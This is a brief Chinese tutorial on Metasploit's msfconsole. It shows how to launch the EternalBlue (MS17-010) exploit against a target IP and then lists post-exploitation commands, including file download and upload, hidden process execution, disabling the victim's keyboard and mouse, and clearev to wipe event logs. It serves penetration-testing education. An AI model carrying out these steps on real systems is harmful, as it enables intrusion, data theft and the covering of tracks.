MSFConsole指南：从入门到免费掌握，轻松进阶

学习渗透测试及后渗透阶段中的MSFConsole应用技巧

在网络安全学习中，MSFConsole是一个非常强大的工具，可以帮助我们进行渗透测试，并在后渗透阶段执行各种操作。本文将简要介绍其在实际渗透测试中的应用方法和后渗透阶段的技巧。需要强调的是，本文所述技术仅适用于合法的网络安全学习环境，任何非法行为造成的后果均自行承担。

漏洞扫描与利用

在利用MSFConsole进行漏洞扫描和利用时，首先要搜索相关漏洞。以MS17-010为例，执行以下命令进行搜索：

search ms17_010

然后使用use命令进入指定模块：

use exploit/windows/smb/ms17_010_eternalblue

使用info命令查看模块相关信息：

info

通过set命令设置载荷相关信息，例如：

set RHOSTS 192.168.123.35

最后，点击run开始渗透。如果目标系统存在该漏洞，则成功进入目标系统。

后渗透阶段

后渗透阶段是指在成功获取目标主机会话后需要执行的操作。以下是一些常用操作：

• 进入CMD： 通过输入shell命令，可以进入系统的CMD命令输入框。如果出现中文乱码的情况，可以使用chcp 65001解决中文乱码问题。输入exit可以退出CMD，重新进入MSF框架。
• 
• 查看主机是否在虚拟机运行：

run post/windows/gather/checkvm

• 获取主机详细信息：

run scraper

• 文件相关操作：
  • pwd：查看当前目录
  • cd：切换目标目录
  • cat：读取文件内容
  • rm：删除文件
  • edit：使用vim编辑文件
  • ls：获取当前目录下的文件
  • mkdir：新建目录
  • rmdir：删除目录
  • download file：从目标系统中下载文件
  • upload file：向目标系统上传文件
• 禁止目标主机使用键盘鼠标：

uictl disable(enable) keyboard # 禁止(允许)目标使用键盘 uictl disable(enable) mouse # 禁止(允许)目标使用鼠标

• 运行指定程序：

execute -f 指定的可执行文件

其中，-f指定可执行文件，-H创建一个隐藏进程，-a传递给命令的参数，-i跟进程进行交互，-m从内存中执行，-t使用当前伪造的线程令牌运行进程，-s在给定会话中执行进程。

• 清除事件日志：

clearev

通过这些操作，我们可以更有效地利用MSFConsole进行渗透测试，并在后渗透阶段执行必要的操作。